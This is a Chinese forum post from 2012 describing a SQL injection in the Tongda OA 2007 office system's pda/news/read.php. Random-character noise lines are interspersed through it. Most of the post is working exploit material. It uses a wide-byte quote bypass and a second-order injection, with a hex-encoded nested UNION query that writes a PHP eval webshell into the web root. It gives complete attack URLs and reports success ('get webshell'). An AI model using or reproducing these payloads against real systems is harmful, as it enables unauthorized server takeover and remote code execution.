目前测试通达OA2007版本
* r& Q& K$ G2 W) z! o, T
9 H3 j% {0 s5 _2 b" o
6 {% V. g: f0 X6 D9 \. }. ]Office Anywhere 2007 网络智能办公系统
7 z7 v) [, j- i( W) r 4 R; s2 H* n, V3 O4 U4 \% A7 V6 d% e
http://127.0.0.1/pda/news/read.php?P=%cf' 猪点。 暴web目录..6 \$ R, k, I6 P/ V' e
" C* C" N$ |$ ]; @9 r
; O( `3 Q& E+ j2 G& d, p [这个时候看了下代码,存在注入的那个变量的语句中第3个字段,在该文件下面被另外个select语句调用了,灵光一闪,大概思路是这样的3 Y# g5 F/ f& q" J
* u- L& N/ A& O% j* }* Q例如:SELECT * from USER where USER_ID='{$USERNAME}'
% r2 {' B8 u* X5 ^$ k( O其中有这么段字段声明$PROVIDER = $ROW['PROVIDER'];被下面个语句$query1 = "SELECT * from USER where USER_ID='{$PROVIDER}'";带入查询了: Y( Y6 x9 u- l& F2 {
& \+ D4 @8 S! w0 V5 |! P+ {
这个时候我们是不是可以组合起来使用哪?
+ R. S4 C4 {; O* Y+ |3 v$ k
3 K$ K5 D) v; D第一条语句开始注入,union select 1,2,3,4,5,6,7,8,9,10...,比如第3个是PROVIDER字段,我们这样
8 Y' i" {$ ^, P& f& Q0 N; W+ ~5 aunion select 1,2,'UNION SELECT 1,1,1,'<?php eval($v);?>',1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 into dumpfile'B:/m.php'#,4,5,6,7,8,9,10
4 c' d+ N F2 V) B1 C O) a ) k9 N- }) w5 I V
这样'UNION SELECT 1,1,1,'<?php eval($v);?>',1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 into dumpfile'B:/m.php'#这个语句就带入第二条语句去写webshell了
- a+ D+ A. S7 j+ l) l# Z
& }# [, u$ D/ N: `那么问题来了,单引号可以吗?当然是不可以的,^_^。。。
: i% {+ `3 h+ M* W8 x5 ~. l5 k/ v
5 {; K8 v' D. _% q* {, f S那么我们用字符串格式带入进行hex编码
: ?: n% H9 q s! w
. P& u, h! b, W: x%cf'UNION SELECT 1,2,3,0x27554e494f4e2053454c45435420312c312c312c273c3f706870206576616c282476293b3f3e272c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c3120696e746f2064756d7066696c6527423a2f6d2e7068702723,5,6,7,8,9,10,11,12,13,14,15,16%23
. R, g+ G7 K" q7 l
/ ~' a+ f1 H3 m S$ N; {测试ok,获取oa的webshell5 L) O0 a3 C; B
) t& b/ E# S( Q' z; Q p: a% b
) L$ d( x% O6 Z% H5 n# u3 cpda/news/read.php?P=%cf'or%281=1%29%23&NEWS_ID=%cf'UNION SELECT 1,2,3,0x27554E494F4E2053454C45435420312C312C312C273C3F706870206576616C282476293B3F3E272C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C3120696E746F2064756D7066696C6527443A2F4D594F412F776562726F6F742F6D2E7068702723,5,6,7,8,9,10,11,12,13,14,15,16%23
8 H" E8 \# s5 a: J0 T8 k, H! ]直接getwebshell |
发表于 2012-12-20 08:09:24
收藏
支持
反对